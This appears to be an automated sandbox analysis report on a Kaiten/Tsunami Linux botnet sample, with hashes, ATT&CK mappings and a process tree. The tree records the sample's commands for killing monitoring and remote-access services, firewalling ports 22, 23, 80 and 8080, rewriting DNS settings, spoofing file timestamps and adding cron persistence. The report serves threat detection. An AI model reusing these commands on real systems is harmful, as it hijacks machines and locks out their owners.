kaiten | 8b929fa993b6eb2bb37281fd265c19c862c4124c770e7c99ce5997a667d0e11b

Analysis

max time kernel
153s
max time network
156s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20231215-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20231215-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
22-12-2023 17:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fa856be9e8018c3a7d4d2351398192d8
Size

40KB
MD5

fa856be9e8018c3a7d4d2351398192d8
SHA1

2bb922f78643a91cf4983482fd2f85d25f1a7073
SHA256

8b929fa993b6eb2bb37281fd265c19c862c4124c770e7c99ce5997a667d0e11b
SHA512

a285f2a0e342d7d8c6fdaf27e6e595707da183e7f793b5a94a714cf7c9cc9e05492e32178479eeaddf740625e568373f1c1069a709fd914bc65fe1f0a1fad1d2
SSDEEP

768:0g8NC9SEia11gVCLI++yrmO2pSEVChObouBkvYwxE3RSinbcuyD7UncG/Hpa0kTb:0g8NC9SENHLIdkmO2pSRhPuBkvYr3Mim

Score

10^/10

kaiten botnet persistence

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1543-1-0x0000000008048000-0x000000000805f448-memory.dmp	family_kaiten2

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc
File opened for modification	/etc/resolv.conf

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.CxNKzS	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/167/stat	killall
File opened for reading	/proc/20/stat	killall
File opened for reading	/proc/8/stat	killall
File opened for reading	/proc/1543/stat	killall
File opened for reading	/proc/80/stat	killall
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/13/stat	killall
File opened for reading	/proc/15/stat	killall
File opened for reading	/proc/1337/cmdline	killall
File opened for reading	/proc/470/stat	killall
File opened for reading	/proc/498/cmdline	killall
File opened for reading	/proc/1152/stat	killall
File opened for reading	/proc/964/stat	killall
File opened for reading	/proc/166/stat	killall
File opened for reading	/proc/1046/stat	killall
File opened for reading	/proc/431/stat	killall
File opened for reading	/proc/482/stat	killall
File opened for reading	/proc/1514/cmdline	killall
File opened for reading	/proc/1298/stat	killall
File opened for reading	/proc/1278/stat	killall
File opened for reading	/proc/177/stat	killall
File opened for reading	/proc/1543/stat	killall
File opened for reading	/proc/964/stat	killall
File opened for reading	/proc/723/cmdline	killall
File opened for reading	/proc/1606/stat	killall
File opened for reading	/proc/11/stat	killall
File opened for reading	/proc/1267/stat	killall
File opened for reading	/proc/1572/stat	killall
File opened for reading	/proc/166/stat	killall
File opened for reading	/proc/27/stat	killall
File opened for reading	/proc/1189/stat	killall
File opened for reading	/proc/14/stat	killall
File opened for reading	/proc/80/stat	killall
File opened for reading	/proc/4/stat	killall
File opened for reading	/proc/115/stat	killall
File opened for reading	/proc/1069/stat	killall
File opened for reading	/proc/30/stat	killall
File opened for reading	/proc/1299/cmdline	killall
File opened for reading	/proc/1175/cmdline	killall
File opened for reading	/proc/675/stat	killall
File opened for reading	/proc/1586/stat	killall
File opened for reading	/proc/675/stat	killall
File opened for reading	/proc/1147/stat	killall
File opened for reading	/proc/1189/cmdline	killall
File opened for reading	/proc/26/stat	killall
File opened for reading	/proc/89/stat	killall
File opened for reading	/proc/28/stat	killall
File opened for reading	/proc/1156/cmdline	killall
File opened for reading	/proc/498/stat	killall
File opened for reading	/proc/1198/stat	killall
File opened for reading	/proc/1046/stat	killall
File opened for reading	/proc/79/stat	killall
File opened for reading	/proc/17/stat	killall
File opened for reading	/proc/209/stat	killall
File opened for reading	/proc/1134/stat	killall
File opened for reading	/proc/1022/stat	killall
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/83/stat	killall
File opened for reading	/proc/1572/stat	killall
File opened for reading	/proc/1575/stat	killall
File opened for reading	/proc/1530/stat	killall
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/13/stat	killall
File opened for reading	/proc/1584/stat	killall

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/udevd0.pid	fa856be9e8018c3a7d4d2351398192d8

/tmp/fa856be9e8018c3a7d4d2351398192d8
/tmp/fa856be9e8018c3a7d4d2351398192d8
1⤵
- Writes file to tmp directory
PID:1543
- /bin/sh
  sh -c "killall -9 tcpdump > /dev/null 2>&1 &"
  2⤵
  PID:1544
- /bin/sh
  sh -c "killall -9 strace > /dev/null 2>&1 &"
  2⤵
  PID:1546
- /bin/sh
  sh -c "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"
  2⤵
  PID:1548
- /bin/sh
  sh -c "killall -9 telnetd > /dev/null 2>&1 &"
  2⤵
  PID:1550
- /bin/sh
  sh -c "service httpd stop > /dev/null 2>&1 &"
  2⤵
  PID:1552
- - /usr/sbin/service
    service httpd stop
    3⤵
    PID:1553
  - - /usr/bin/basename
      basename /usr/sbin/service
      4⤵
      PID:1555
  - - /usr/bin/basename
      basename /usr/sbin/service
      4⤵
      PID:1557
  - - /bin/systemctl
      systemctl --quiet is-active multi-user.target
      4⤵
      PID:1562
  - - /bin/systemctl
      systemctl -p Triggers show acpid.socket
      4⤵
      Reads runtime system information
      PID:1661
  - - /bin/systemctl
      systemctl -p Triggers show apport-forward.socket
      4⤵
      PID:1664
  - - /bin/systemctl
      systemctl -p Triggers show avahi-daemon.socket
      4⤵
      PID:1669
  - - /bin/systemctl
      systemctl -p Triggers show cups.socket
      4⤵
      PID:1672
  - - /bin/systemctl
      systemctl -p Triggers show dbus.socket
      4⤵
      Reads runtime system information
      PID:1675
  - - /bin/systemctl
      systemctl -p Triggers show saned.socket
      4⤵
      PID:1678
  - - /bin/systemctl
      systemctl -p Triggers show snapd.socket
      4⤵
      PID:1681
  - - /bin/systemctl
      systemctl -p Triggers show ssh.socket
      4⤵
      PID:1684
  - - /bin/systemctl
      systemctl -p Triggers show syslog.socket
      4⤵
      PID:1687
  - - /bin/systemctl
      systemctl -p Triggers show systemd-fsckd.socket
      4⤵
      PID:1689
  - - /bin/systemctl
      systemctl -p Triggers show systemd-initctl.socket
      4⤵
      PID:1692
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald-audit.socket
      4⤵
      PID:1695
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald-dev-log.socket
      4⤵
      PID:1698
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald.socket
      4⤵
      PID:1702
  - - /bin/systemctl
      systemctl -p Triggers show systemd-networkd.socket
      4⤵
      PID:1704
  - - /bin/systemctl
      systemctl -p Triggers show systemd-rfkill.socket
      4⤵
      PID:1708
  - - /bin/systemctl
      systemctl -p Triggers show systemd-udevd-control.socket
      4⤵
      PID:1711
  - - /bin/systemctl
      systemctl -p Triggers show systemd-udevd-kernel.socket
      4⤵
      PID:1714
  - - /bin/systemctl
      systemctl -p Triggers show uuidd.socket
      4⤵
      PID:1717
- /bin/sh
  sh -c "service telnetd stop > /dev/null 2>&1 &"
  2⤵
  PID:1554
- - /usr/sbin/service
    service telnetd stop
    3⤵
    PID:1556
  - - /usr/bin/basename
      basename /usr/sbin/service
      4⤵
      PID:1563
  - - /usr/bin/basename
      basename /usr/sbin/service
      4⤵
      PID:1567
  - - /bin/systemctl
      systemctl --quiet is-active multi-user.target
      4⤵
      PID:1570
  - - /bin/systemctl
      systemctl -p Triggers show acpid.socket
      4⤵
      PID:1662
  - - /bin/systemctl
      systemctl -p Triggers show apport-forward.socket
      4⤵
      PID:1666
  - - /bin/systemctl
      systemctl -p Triggers show avahi-daemon.socket
      4⤵
      PID:1670
  - - /bin/systemctl
      systemctl -p Triggers show cups.socket
      4⤵
      PID:1673
  - - /bin/systemctl
      systemctl -p Triggers show dbus.socket
      4⤵
      PID:1676
  - - /bin/systemctl
      systemctl -p Triggers show saned.socket
      4⤵
      PID:1679
  - - /bin/systemctl
      systemctl -p Triggers show snapd.socket
      4⤵
      PID:1682
  - - /bin/systemctl
      systemctl -p Triggers show ssh.socket
      4⤵
      PID:1685
  - - /bin/systemctl
      systemctl -p Triggers show syslog.socket
      4⤵
      PID:1688
  - - /bin/systemctl
      systemctl -p Triggers show systemd-fsckd.socket
      4⤵
      PID:1691
  - - /bin/systemctl
      systemctl -p Triggers show systemd-initctl.socket
      4⤵
      PID:1694
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald-audit.socket
      4⤵
      PID:1697
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald-dev-log.socket
      4⤵
      PID:1700
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald.socket
      4⤵
      PID:1703
  - - /bin/systemctl
      systemctl -p Triggers show systemd-networkd.socket
      4⤵
      PID:1706
  - - /bin/systemctl
      systemctl -p Triggers show systemd-rfkill.socket
      4⤵
      PID:1709
  - - /bin/systemctl
      systemctl -p Triggers show systemd-udevd-control.socket
      4⤵
      PID:1712
  - - /bin/systemctl
      systemctl -p Triggers show systemd-udevd-kernel.socket
      4⤵
      PID:1715
  - - /bin/systemctl
      systemctl -p Triggers show uuidd.socket
      4⤵
      PID:1718
- /bin/sh
  sh -c "service sshd stop > /dev/null 2>&1 &"
  2⤵
  PID:1558
- - /usr/sbin/service
    service sshd stop
    3⤵
    PID:1564
  - - /usr/bin/basename
      basename /usr/sbin/service
      4⤵
      PID:1566
  - - /usr/bin/basename
      basename /usr/sbin/service
      4⤵
      PID:1571
  - - /bin/systemctl
      systemctl --quiet is-active multi-user.target
      4⤵
      PID:1573
  - - /bin/systemctl
      systemctl -p Triggers show acpid.socket
      4⤵
      PID:1663
  - - /bin/systemctl
      systemctl -p Triggers show apport-forward.socket
      4⤵
      PID:1668
  - - /bin/systemctl
      systemctl -p Triggers show avahi-daemon.socket
      4⤵
      PID:1671
  - - /bin/systemctl
      systemctl -p Triggers show cups.socket
      4⤵
      PID:1674
  - - /bin/systemctl
      systemctl -p Triggers show dbus.socket
      4⤵
      PID:1677
  - - /bin/systemctl
      systemctl -p Triggers show saned.socket
      4⤵
      PID:1680
  - - /bin/systemctl
      systemctl -p Triggers show snapd.socket
      4⤵
      PID:1683
  - - /bin/systemctl
      systemctl -p Triggers show ssh.socket
      4⤵
      PID:1686
  - - /bin/systemctl
      systemctl -p Triggers show syslog.socket
      4⤵
      PID:1690
  - - /bin/systemctl
      systemctl -p Triggers show systemd-fsckd.socket
      4⤵
      PID:1693
  - - /bin/systemctl
      systemctl -p Triggers show systemd-initctl.socket
      4⤵
      PID:1696
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald-audit.socket
      4⤵
      PID:1699
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald-dev-log.socket
      4⤵
      PID:1701
  - - /bin/systemctl
      systemctl -p Triggers show systemd-journald.socket
      4⤵
      Reads runtime system information
      PID:1705
  - - /bin/systemctl
      systemctl -p Triggers show systemd-networkd.socket
      4⤵
      PID:1707
  - - /bin/systemctl
      systemctl -p Triggers show systemd-rfkill.socket
      4⤵
      PID:1710
  - - /bin/systemctl
      systemctl -p Triggers show systemd-udevd-control.socket
      4⤵
      PID:1713
  - - /bin/systemctl
      systemctl -p Triggers show systemd-udevd-kernel.socket
      4⤵
      PID:1716
  - - /bin/systemctl
      systemctl -p Triggers show uuidd.socket
      4⤵
      PID:1719
- /bin/sh
  sh -c "killall -9 telnetd > /dev/null 2>&1 &"
  2⤵
  PID:1565
- /bin/sh
  sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
  2⤵
  PID:1569
- /bin/sh
  sh -c "killall -9 dropbear > /dev/null 2>&1 &"
  2⤵
  PID:1574
- - /usr/bin/killall
    killall -9 dropbear
    3⤵
    - Reads runtime system information
    PID:1577
- /bin/sh
  sh -c "killall -9 sshd > /dev/null 2>&1 &"
  2⤵
  PID:1578
- - /usr/bin/killall
    killall -9 sshd
    3⤵
    - Reads runtime system information
    PID:1580
- /bin/sh
  sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
  2⤵
  PID:1582
- /bin/sh
  sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
  2⤵
  PID:1588
- /bin/sh
  sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
  2⤵
  PID:1592
- /bin/sh
  sh -c "nvram set http_enable=0 > /dev/null 2>&1"
  2⤵
  PID:1593
- /bin/sh
  sh -c "killall -9 httpd > /dev/null 2>&1 &"
  2⤵
  PID:1594
- - /usr/bin/killall
    killall -9 httpd
    3⤵
    - Reads runtime system information
    PID:1595
- /bin/sh
  sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
  2⤵
  PID:1596
- /bin/sh
  sh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"
  2⤵
  PID:1599
- /bin/sh
  sh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"
  2⤵
  PID:1601
- /bin/sh
  sh -c "rm -rf /var/run/tt* > /dev/null 2>&1 &"
  2⤵
  PID:1603
- - /bin/rm
    rm -rf "/var/run/tt*"
    3⤵
    PID:1604
- /bin/sh
  sh -c "rm -rf /tmp/tt* > /dev/null 2>&1 &"
  2⤵
  PID:1605
- /bin/sh
  sh -c "killall -9 arm > /dev/null 2>&1 &"
  2⤵
  PID:1607
- /bin/sh
  sh -c "killall -9 mips > /dev/null 2>&1 &"
  2⤵
  PID:1609
- - /usr/bin/killall
    killall -9 mips
    3⤵
    - Reads runtime system information
    PID:1610
- /bin/sh
  sh -c "killall -9 mipsel > /dev/null 2>&1 &"
  2⤵
  PID:1611
- /bin/sh
  sh -c "killall -9 powerpc > /dev/null 2>&1 &"
  2⤵
  PID:1613
- - /usr/bin/killall
    killall -9 powerpc
    3⤵
    - Reads runtime system information
    PID:1614
- /bin/sh
  sh -c "killall -9 ppc > /dev/null 2>&1 &"
  2⤵
  PID:1615
- - /usr/bin/killall
    killall -9 ppc
    3⤵
    - Reads runtime system information
    PID:1616
- /bin/sh
  sh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"
  2⤵
  PID:1617
- - /usr/bin/killall
    killall -9 daemon.armv4l.mod
    3⤵
    - Reads runtime system information
    PID:1618
- /bin/sh
  sh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"
  2⤵
  PID:1619
- /bin/sh
  sh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"
  2⤵
  PID:1621
- - /usr/bin/killall
    killall -9 daemon.mips.mod
    3⤵
    - Reads runtime system information
    PID:1622
- /bin/sh
  sh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"
  2⤵
  PID:1623
- - /usr/bin/killall
    killall -9 daemon.mipsel.mod
    3⤵
    - Reads runtime system information
    PID:1624
- /bin/sh
  sh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"
  2⤵
  PID:1625
- - /bin/rm
    rm -rf "/tmp/.xs/*"
    3⤵
    PID:1626
- /bin/sh
  sh -c "iptables -A INPUT -p tcp --dport 22 -j DROP > /dev/null 2>&1 &"
  2⤵
  PID:1627
- - /sbin/iptables
    iptables -A INPUT -p tcp --dport 22 -j DROP
    3⤵
    PID:1628
- /bin/sh
  sh -c "iptables -A INPUT -p tcp --dport 23 -j DROP > /dev/null 2>&1 &"
  2⤵
  PID:1629
- - /sbin/iptables
    iptables -A INPUT -p tcp --dport 23 -j DROP
    3⤵
    PID:1630
- /bin/sh
  sh -c "iptables -A INPUT -p tcp --dport 80 -j DROP > /dev/null 2>&1 &"
  2⤵
  PID:1631
- - /sbin/iptables
    iptables -A INPUT -p tcp --dport 80 -j DROP
    3⤵
    PID:1635
- /bin/sh
  sh -c "iptables -A INPUT -p tcp --dport 8080 -j DROP > /dev/null 2>&1 &"
  2⤵
  PID:1637
- /bin/sh
  sh -c "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"
  2⤵
  PID:1639
- /bin/sh
  sh -c "chmod 700 /tmp/fa856be9e8018c3a7d4d2351398192d8 > /dev/null 2>&1 &"
  2⤵
  PID:1641
- /bin/sh
  sh -c "touch -acmr /bin/ls /tmp/fa856be9e8018c3a7d4d2351398192d8"
  2⤵
  PID:1643
- - /usr/bin/touch
    touch -acmr /bin/ls /tmp/fa856be9e8018c3a7d4d2351398192d8
    3⤵
    PID:1644
- /bin/sh
  sh -c "(crontab -l | grep -v \"/tmp/fa856be9e8018c3a7d4d2351398192d8\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"
  2⤵
  PID:1645
- /bin/sh
  sh -c "echo \"* * * * * /tmp/fa856be9e8018c3a7d4d2351398192d8 > /dev/null 2>&1 &\" >> /var/run/.x001804289383"
  2⤵
  PID:1651
- /bin/sh
  sh -c "crontab /var/run/.x001804289383"
  2⤵
  PID:1652
- - /usr/bin/crontab
    crontab /var/run/.x001804289383
    3⤵
    - Creates/modifies Cron job
    PID:1653
- /bin/sh
  sh -c "rm -rf /var/run/.x001804289383"
  2⤵
  PID:1654
- - /bin/rm
    rm -rf /var/run/.x001804289383
    3⤵
    PID:1655

/usr/bin/killall
killall -9 tcpdump
1⤵
- Reads runtime system information
PID:1545

/usr/bin/killall
killall -9 strace
1⤵
- Reads runtime system information
PID:1547

/usr/bin/killall
killall -9 telnetd
1⤵
- Reads runtime system information
PID:1551

/usr/bin/killall
killall -9 telnetd
1⤵
- Reads runtime system information
PID:1568

/usr/bin/killall
killall -9 utelnetd
1⤵
- Reads runtime system information
PID:1572

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
PID:1576

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:1579

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
PID:1583

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:1585

/usr/bin/killall
killall -9 minihttpd
1⤵
PID:1584

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
PID:1587

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:1589

/bin/cat
cat /var/run/thttpd.pid
1⤵
PID:1591

/bin/cat
cat /var/run/httpd.pid
1⤵
PID:1598

/bin/rm
rm -rf /var/run/wgsh
1⤵
PID:1600

/bin/rm
rm -rf /var/run/bbsh
1⤵
PID:1602

/bin/rm
rm -rf "/tmp/tt*"
1⤵
PID:1606

/usr/bin/killall
killall -9 arm
1⤵
- Reads runtime system information
PID:1608

/usr/bin/killall
killall -9 mipsel
1⤵
- Reads runtime system information
PID:1612

/usr/bin/killall
killall -9 daemon.i686.mod
1⤵
- Reads runtime system information
PID:1620

/sbin/iptables
iptables -A INPUT -p tcp --dport 8080 -j DROP
1⤵
PID:1638

/bin/chmod
chmod 700 /tmp/fa856be9e8018c3a7d4d2351398192d8
1⤵
PID:1642

/usr/bin/crontab
crontab -l
1⤵
PID:1647

/bin/grep
grep -v /tmp/fa856be9e8018c3a7d4d2351398192d8
1⤵
PID:1648

/bin/grep
grep -v "no cron"
1⤵
PID:1649

/bin/grep
grep -v lesshts/run.sh
1⤵
PID:1650

/bin/sh
sh -c "/bin/uname -n"
1⤵
PID:1657
- /bin/uname
  /bin/uname -n
  2⤵
  PID:1658

/bin/sh
sh -c "/bin/uname -n"
1⤵
PID:1659
- /bin/uname
  /bin/uname -n
  2⤵
  PID:1660

/usr/local/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:1553

/usr/local/bin/systemctl
systemctl stop httpd.service
1⤵
PID:1553

/usr/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:1553

/usr/bin/systemctl
systemctl stop httpd.service
1⤵
PID:1553

/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:1553

/bin/systemctl
systemctl stop httpd.service
1⤵
PID:1553

/usr/local/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:1556

/usr/local/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:1556

/usr/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:1556

/usr/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:1556

/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:1556

/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:1556

/usr/local/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:1564

/usr/local/bin/systemctl
systemctl stop sshd.service
1⤵
PID:1564

/usr/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:1564

/usr/bin/systemctl
systemctl stop sshd.service
1⤵
PID:1564

/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:1564

/bin/systemctl
systemctl stop sshd.service
1⤵
PID:1564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/run/.x001804289383

Filesize
67B

MD5
c82e7bce63ce9c10fc9305f34de5a252

SHA1
c21a1bce9156d4a4d2e8007b4bcdfde5e6aeded9

SHA256
aef6ad9f7259f1b7509f17f0bd7932188944e8764f0790d5e84f9a425313f0ee

SHA512
bd50efc7e88368087c21cb8cd9efda24650ea54c1c839dc0447e1e2a1bc2f54027f14e2183df1fdcbbca3598ec78e0aa2b632f8409de9e6957ba2aea92c42589

Download Submit
/var/spool/cron/crontabs/tmp.CxNKzS

Filesize
264B

MD5
434b2f53c608af85a59f7a910299af6c

SHA1
52992d9eaa8633dcb50984f8f6a524315569335b

SHA256
42c3259f9f6c1420e321dfeb87f379b445977ca176c3dc2913ae86d9e9043d11

SHA512
c7de42dd8c512a5f604bd80f25b30a106bef87223a752776440d01c9315af12896bcef02866100fe4b5c7b3df088219b97d91376ce8c7a98f1ea0308c1f87e2f

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads